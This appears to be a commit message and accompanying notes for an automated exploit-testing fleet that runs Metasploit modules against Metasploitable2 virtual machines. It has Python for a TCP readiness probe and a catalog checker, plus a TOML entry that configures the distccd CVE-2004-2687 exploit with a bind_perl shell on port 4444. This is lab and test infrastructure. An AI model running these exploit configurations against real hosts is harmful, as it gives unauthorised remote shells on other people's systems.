Bug 10: _wait_for_tcp returned on recv()→b'' (connection closed by peer),
falsely signalling service-ready. Only socket.timeout or non-empty data
are genuine ready signals; b'' now retries.
Bug 11: distccd_command_exec and unreal_ircd_3281_backdoor incorrectly
had requires_bridge=true. bind_perl payloads connect inward (host→guest
via hostfwd), not outward — no bridge egress needed. Both modules now
run on SLIRP-only fleet slots.
Bug 12: msgpack.unpackb crashed on integer session IDs from msfrpcd 6.x
(strict_map_key=True default). Added strict_map_key=False.
Bug 13 (documented): samba_usermap_script removed from catalog (NoReply
on every fire — already handled in dca6144 on origin/main).
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
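The readiness probe that Bug 10 describes, written out as an added example (it is not the project's `_wait_for_tcp`; the names `_probe_once`, `wait_for_tcp`, `fake_listener` and `closed_port` are mine, and the loopback listeners are constructed stand-ins for a hostfwd whose guest side is, or is not, up yet). The point is the three-way split on what a connect-then-recv tells you: a banner or a quiet peer means the service is there, `b''` means the peer accepted and immediately closed, which must retry rather than return ready.

```python
import socket
import threading
import time


def _probe_once(host, port, connect_timeout=1.0, read_timeout=0.5):
    """One readiness probe. Returns True only on a genuine ready signal.

    Genuine: the TCP connect succeeded and the peer either sent data
    (a banner) or stayed silent until read_timeout (socket.timeout).
    Not genuine: recv() returning b'' -- the peer accepted and closed at
    once, which is what a hostfwd whose guest-side service is not up yet
    looks like. Connection errors (refused, reset) are also not ready.
    """
    try:
        with socket.create_connection((host, port), timeout=connect_timeout) as s:
            s.settimeout(read_timeout)
            try:
                data = s.recv(1)
            except socket.timeout:
                return True          # connected, peer quiet: ready
            return data != b""       # banner: ready; b'': closed by peer, retry
    except OSError:
        return False                 # ECONNREFUSED, ECONNRESET, ...


def wait_for_tcp(host, port, deadline_s=30.0, interval_s=0.5, probe=_probe_once):
    """Poll until probe() reports ready or the deadline passes.

    Returns (ready, attempts) so a caller can log how long the service took.
    """
    end = time.monotonic() + deadline_s
    attempts = 0
    while True:
        attempts += 1
        if probe(host, port):
            return True, attempts
        if time.monotonic() >= end:
            return False, attempts
        time.sleep(interval_s)


# --- constructed local peers for exercising the probe offline --------------

def fake_listener(behaviour, connections=100):
    """Start a loopback listener; returns its port.

    behaviour: "close"  -> accept and close immediately (client sees b'')
               "banner" -> accept, send a line, then close
               "silent" -> accept and hold the connection open without data
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    port = srv.getsockname()[1]

    def serve():
        for _ in range(connections):
            conn, _peer = srv.accept()
            if behaviour == "banner":
                conn.sendall(b"READY\n")   # constructed banner, not a real protocol
                time.sleep(0.2)
            elif behaviour == "silent":
                time.sleep(2.0)
            conn.close()                   # "close": fall through and close at once
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def closed_port():
    """A loopback port that was just freed, so connecting to it is refused."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


if __name__ == "__main__":
    for mode in ("close", "banner", "silent"):
        p = fake_listener(mode)
        print(mode, wait_for_tcp("127.0.0.1", p, deadline_s=1.0, interval_s=0.2))
```

With the "close" listener the old behaviour (treating `b''` as ready) would have returned on the first attempt; this version keeps retrying until the deadline and reports not-ready, which is the signal the fleet needs to wait for the guest service instead of firing a module at a dead forward.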
34 lines
1 KiB
TOML
description = """
distccd v1 unauthenticated command execution (CVE-2004-2687). The
distcc daemon doesn't verify the source of compile jobs, so a
crafted DCC_CMD-style request runs an arbitrary command as the
distccd user. Metasploitable2 ships distccd 2.18.3 listening on
3632. Returns a low-priv shell — paired with a privesc later if
needed; for envelope work the unprivileged shell is enough.
"""

[module]
type = "exploit"
path = "unix/misc/distcc_exec"

[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 3632

[payload]
# Bind shell on a fixed in-guest port. The host hostfwds this port
# (see runtime.extra_target_ports) so msfrpcd can connect to it
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
# reverse_tcp payload hits.
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4444

[session]
type = "shell"

[runtime]
# bind_perl opens a new guest port; fleet hostfwds it via SLIRP.
# No bridge egress needed — host connects in, not guest out.
requires_bridge = false
extra_target_ports = [4444]
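The catalog entry encodes a rule the comments state in prose: a bind payload is reached host-to-guest through a hostfwd, so its LPORT must appear in `runtime.extra_target_ports` and `requires_bridge` should be false, while a reverse payload needs guest egress that SLIRP with restrict=on does not give. Below is an added consistency check that enforces exactly that rule over an entry (example code, not the project's loader or schema; `DISTCC_ENTRY` is a constructed dict mirroring the TOML above, `payload_direction`, `check_entry`, `variant` and `load_entry` are names I chose, and the bind_/reverse_ prefix convention is the Metasploit payload naming the entry itself relies on). It is the check that would have caught Bug 11 before the module burned a bridged slot.

```python
import copy
from typing import Dict, List

# Constructed in-memory form of the catalog entry above (what a TOML loader
# returns); illustrative, not the project's own loader or schema.
DISTCC_ENTRY = {
    "module": {
        "type": "exploit",
        "path": "unix/misc/distcc_exec",
        "options": {"RHOSTS": "{{ target_ip }}", "RPORT": 3632},
    },
    "payload": {"path": "cmd/unix/bind_perl", "options": {"LPORT": 4444}},
    "session": {"type": "shell"},
    "runtime": {"requires_bridge": False, "extra_target_ports": [4444]},
}


def payload_direction(payload_path: str) -> str:
    """Classify a Metasploit payload path by who opens the TCP connection."""
    name = payload_path.rsplit("/", 1)[-1]
    if name.startswith("bind_"):
        return "inward"    # host -> guest via hostfwd; no guest egress needed
    if name.startswith("reverse_"):
        return "outward"   # guest -> host; needs egress, which SLIRP restrict=on blocks
    return "unknown"


def check_entry(entry: Dict) -> List[str]:
    """Return a list of consistency problems (empty means the entry is sound)."""
    problems: List[str] = []
    payload = entry.get("payload", {})
    runtime = entry.get("runtime", {})
    direction = payload_direction(payload.get("path", ""))
    lport = payload.get("options", {}).get("LPORT")
    extra_ports = runtime.get("extra_target_ports", [])
    bridge = bool(runtime.get("requires_bridge", False))

    if direction == "inward":
        # The host must be able to reach the bind port, so it has to be hostfwd'd.
        if lport is None:
            problems.append("bind payload has no LPORT to hostfwd")
        elif lport not in extra_ports:
            problems.append(f"bind payload LPORT {lport} is not in runtime.extra_target_ports")
        # Bug 11 in the commit above: a bind payload does not need bridge egress.
        if bridge:
            problems.append("bind payload marked requires_bridge=true; it connects inward, "
                            "so this wastes a bridged fleet slot")
    elif direction == "outward":
        if not bridge:
            problems.append("reverse payload with requires_bridge=false; the guest cannot "
                            "connect out through SLIRP with restrict=on")
    else:
        problems.append(f"cannot infer connection direction from payload {payload.get('path')!r}")
    return problems


def variant(entry: Dict, section: str, key: str, value) -> Dict:
    """Deep-copied entry with one key changed, for what-if checks."""
    out = copy.deepcopy(entry)
    out.setdefault(section, {})[key] = value
    return out


def load_entry(text: str) -> Dict:
    """Parse a catalog TOML file into the dict form used above (Python 3.11+)."""
    import tomllib
    return tomllib.loads(text)


if __name__ == "__main__":
    print(check_entry(DISTCC_ENTRY))                                          # []
    print(check_entry(variant(DISTCC_ENTRY, "runtime", "requires_bridge", True)))
```

Run over the whole catalog directory (`load_entry(path.read_text())` per file) this is cheap enough to sit in CI; the "unknown" direction branch is deliberate so that a payload whose name fits neither prefix fails loudly instead of silently inheriting the bind-side defaults.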